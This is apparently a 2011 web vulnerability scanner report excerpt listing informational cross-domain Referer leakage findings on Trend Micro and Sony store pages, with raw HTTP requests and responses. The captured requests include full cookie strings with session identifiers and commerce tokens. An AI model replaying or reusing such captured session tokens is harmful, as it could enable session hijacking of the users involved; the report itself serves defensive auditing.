Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:42 GMT
Content-Length: 36056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...

12. Cross-domain Referer leakage
There are 12 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


12.1. http://blog.trendmicro.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?p=12640 HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://us.trendmicro.com/us/search/?q=xss&search.x=2&search.y=10&search=search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Link: <http://blog.trendmicro.com/12640>; rel=shortlink
Link: <http://blog.trendmicro.com/?p=12640>; rel=shortlink
X-Varnish: 1696291508
Content-Length: 55144
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:16:26 GMT
Date: Tue, 06 Sep 2011 18:16:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'></script>
...[SNIP]...
<map name="Map">
<area shape="rect" coords="22,14,57,48" href="http://www.facebook.com/Trendmicro" target="_blank" alt="Trend Micro Facebook">
<area shape="rect" coords="62,15,99,47" href="http://www.twitter.com/TrendLabs " target="_blank" alt="TrendLabs Twitter">
<area shape="rect" coords="101,15,134,49" href="http://feeds.trendmicro.com/Anti-MalwareBlog/" target="_blank" alt="Malware Blog RSS Feed">
<area shape="rect" coords="142,14,180,49" href="http://www.youtube.com/trendmicroinc" target="_blank" alt="You Tube - Trend Micro">
</map>
...[SNIP]...
</div>
        <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"

type="text/javascript">


</script>
...[SNIP]...
<div style="width:83px;padding-top:4px;"><iframe src="http://www.facebook.com/plugins/like.php?locale=en_US&href=http://blog.trendmicro.com/xss-methods-also-seen-being-used-in-mass-compromises/&amp;layout=button_count&amp;show-faces=false&amp;width=83px&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:83px; height:21px;" allowtransparency="true"></iframe>
...[SNIP]...
<div style="padding-top:3px; width:108px;"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.trendmicro.com/xss-methods-also-seen-being-used-in-mass-compromises/" data-text="XSS Methods Also Seen Being Used in Mass Compromises" data-count="horizontal">Tweet</a>
        <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>&nbsp;&nbsp; <a title="Technorati" rel="nofollow" href="http://technorati.com/faves?add=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"><img title="Technorati" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/technorati.png" alt="Technorati" border="0" /></a>&nbsp;&nbsp; <a title="NewsVine" rel="nofollow" target="_blank" href="http://www.newsvine.com/_tools/seed&amp;save?u=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" ><img src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/newsvine.png" title="NewsVine" alt="NewsVine" border="0" /></a>&nbsp;&nbsp; <a title="MySpace" rel="nofollow" href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"><img title="MySpace" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/myspace.png" alt="MySpace" border="0" /></a>&nbsp;&nbsp; <a title="Google" rel="nofollow" href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"><img title="Google" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/googlebookmark.png" alt="Google" border="0" />
...[SNIP]...
</a>&nbsp;&nbsp; <a title="del.icio.us" rel="nofollow" href="http://del.icio.us/post?url=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"><img title="del.icio.us" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/delicious.png" alt="del.icio.us" border="0" /></a>&nbsp;&nbsp; <a title="StumbleUpon" rel="nofollow" href="http://www.stumbleupon.com/submit?url=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"><img title="StumbleUpon" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/stumbleupon.png" alt="StumbleUpon" border="0" />
...[SNIP]...
</div>-->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div class="blogs" align="left"><a href="http://countermeasures.trendmicro.eu/" target="_blank">CounterMeasures Blog </a>
...[SNIP]...
<div class="blogs" align="left"><a href="http://www.simplysecurity.com/" target="_blank">Simply Security News</a>
...[SNIP]...
<div class="blogs" align="left"><a href="http://blog.trendmicro.de/#" target="_blank">Trend Micro Blog [German]</a>
...[SNIP]...
<td width="148" height="195" align="right" valign="bottom"><a href="http://free.antivirus.com/" target="_blank"><img src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/blogimages2010/freetools.jpg" alt="Trend Micro Free Tools" width="140" height="192" border="0">
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-88yo-3lmt3UHI.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
</script>
<script src='//libs.coremetrics.com/eluminate.js'></script>
...[SNIP]...

12.2. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /wp-content/plugins/flash-gallery/js/addOnLoad.js

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /wp-content/plugins/flash-gallery/js/addOnLoad.js?ver=1 HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/?p=12640
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 02 Dec 2010 03:50:59 GMT
ETag: "18c4d1-2c1-49665546aeec0"
Accept-Ranges: bytes
Content-Length: 705
Content-Type: application/x-javascript
Date: Tue, 06 Sep 2011 18:16:27 GMT
Connection: close

/*http://core.trac.wordpress.org/changeset/6482*/
if(typeof addLoadEvent !== 'function'){addLoadEvent=(function(){var e=[],t,s,n,i,o,d=document,w=window,r='readyState',c='onreadystatechange',x=functi
...[SNIP]...
1;clearInterval(t);while(i=e.shift())i();if(s)s[c]=''};return function(f){if(n)return f();if(!e[0]){d.addEventListener&&d.addEventListener("DOMContentLoaded",x,false);/*@cc_on@*//*@if(@_win32)d.write("<script id=__ie_onload defer src=//0><\/scr"+"ipt>
...[SNIP]...

12.3. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://www.sony.com/SonySearch/Search?mode=&action=search&pst=xss+playstation&pti=0&psti=0&first=1&sti=0&st=Laptop&ti=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Cteonnt-Length: 104997
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 104997
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<link rel="canonical"
...[SNIP]...
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="sgnlSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#">
<h3>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"><span class="bloggerLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<div class="cta">
<a rel="Body_Tier 1_Media Remote App for iPhone/iPad CTA"
href="http://itunes.apple.com/us/app/media-remote-for-iphone/id373459732?mt=8#"
class="redArrowLink externalCTA" target="_blank">

Explore Media Remote app for iPhone/iPad
</a>
...[SNIP]...
<div class="cta">
<a href="https://market.android.com/details?id=com.sony.seconddisplay.view&feature=search_result"
class="redArrowLink externalCTA" target="_blank"
rel="Body_Tier 1_Media Remote App for Android CTA">

Explore Media Remote app for Android
</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

12.4. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; 
TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 114876
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 06 Sep 2011 18:50:12 GMT
Content-Length: 114876
Connection: close
Vary: Accept-Encoding
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="sgnlSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#">
<h3>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"><span class="bloggerLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

12.5. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
